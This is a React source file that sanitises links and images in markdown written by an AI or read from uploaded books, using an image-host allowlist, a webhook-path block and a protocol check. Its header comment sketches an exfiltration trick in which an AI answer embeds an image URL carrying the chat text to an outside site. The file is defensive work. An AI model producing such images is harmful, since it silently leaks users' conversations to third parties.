// Safe links and images for markdown written by the AI or read from an uploaded book.
//
// An image loads the moment it is shown, so an answer that contains
// ![](https://other-site/?q=<chat text>) would quietly send the chat to that site.
// Images therefore load only from our own addresses or from data: pictures; any
// other image is shown as a plain link the teacher can choose to open.
// Links open in a new tab and must be http(s); javascript: and similar never become links.
import React from 'react';
import { OCR_BASE_URL } from '../features/knowledge-bases/ocrConfig';

const OUR_DOMAIN = /(^|\.)maisumhayati-ai\.com$/i;

const hostOf = (url) => {
  try { return new URL(url).hostname.toLowerCase(); } catch (e) { return ''; }
};

// Extra image hosts can be allowed at build time without a code change, e.g.
// REACT_APP_IMAGE_HOSTS=images.example.org,cdn.example.net
const extraHosts = () => String(process.env.REACT_APP_IMAGE_HOSTS || '')
  .split(',')
  .map((h) => h.trim().toLowerCase())
  .filter(Boolean);

const trustedHosts = () => new Set([
  hostOf(OCR_BASE_URL),
  hostOf(process.env.REACT_APP_N8N_BASE_URL || ''),
  ...extraHosts(),
].filter(Boolean));

// data: pictures. Inside an <img> tag even an SVG picture cannot run code.
const DATA_IMAGE = /^data:image\/(png|jpe?g|gif|webp|bmp|avif|svg\+xml)[;,]/i;

export function safeHttpUrl(raw) {
  try {
    const u = new URL(String(raw));
    return (u.protocol === 'http:' || u.protocol === 'https:') ? u : null;
  } catch (e) {
    return null;
  }
}

// Links may also be e-mail addresses, as react-markdown allowed before.
const safeLinkUrl = (raw) => {
  const web = safeHttpUrl(raw);
  if (web) return web.href;
  return /^mailto:[^\s<>"]+$/i.test(String(raw || '').trim()) ? String(raw).trim() : null;
};

export function isAllowedImageSrc(src) {
  if (typeof src !== 'string') return false;
  const value = src.trim();
  if (!value) return false;
  if (DATA_IMAGE.test(value)) return true;
  let u;
  try {
    u = new URL(value, window.location.href);
  } catch (e) {
    return false;
  }
  if (u.origin === window.location.origin) return true; // a picture on this website
  if (u.protocol !== 'https:') return false;
  const host = u.hostname.toLowerCase();
  // An image tag must never call our backend's webhooks. Check the decoded path too:
  // '/%77ebhook/x' reaches /webhook/x on the server.
  let path;
  try {
    path = decodeURIComponent(u.pathname);
  } catch (e) {
    return false;
  }
  if (/^\/+webhook/i.test(path)) return false;
  return OUR_DOMAIN.test(host) || trustedHosts().has(host);
}

// react-markdown `urlTransform`: its normal safety rules, plus data: pictures in <img src>.
// (The default would drop data: pictures, which the book viewer needs.)
export function makeUrlTransform(defaultUrlTransform) {
  return (url, key) => (
    key === 'src' && typeof url === 'string' && DATA_IMAGE.test(url.trim())
      ? url
      : defaultUrlTransform(url)
  );
}

export function SafeMarkdownLink({ node, href, children, className, ...rest }) {
  const ok = safeLinkUrl(href);
  if (!ok) return <span className={className}>{children}</span>;
  return (
    <a {...rest} className={className} href={ok} target="_blank" rel="noopener noreferrer nofollow">
      {children}
    </a>
  );
}

export function SafeMarkdownImage({ node, src, alt, ...rest }) {
  if (isAllowedImageSrc(src)) return <img {...rest} src={src} alt={alt || ''} />;
  const link = safeHttpUrl(src);
  const label = alt || (link ? link.hostname : '');
  if (!link) return label ? <span>{label}</span> : null;
  return (
    <a href={link.href} target="_blank" rel="noopener noreferrer nofollow" title={link.href}>
      {label}
    </a>
  );
}

// Drop-in `components` for <ReactMarkdown> where nothing else is customised.
export const SAFE_MARKDOWN_COMPONENTS = {
  a: SafeMarkdownLink,
  img: SafeMarkdownImage,
};
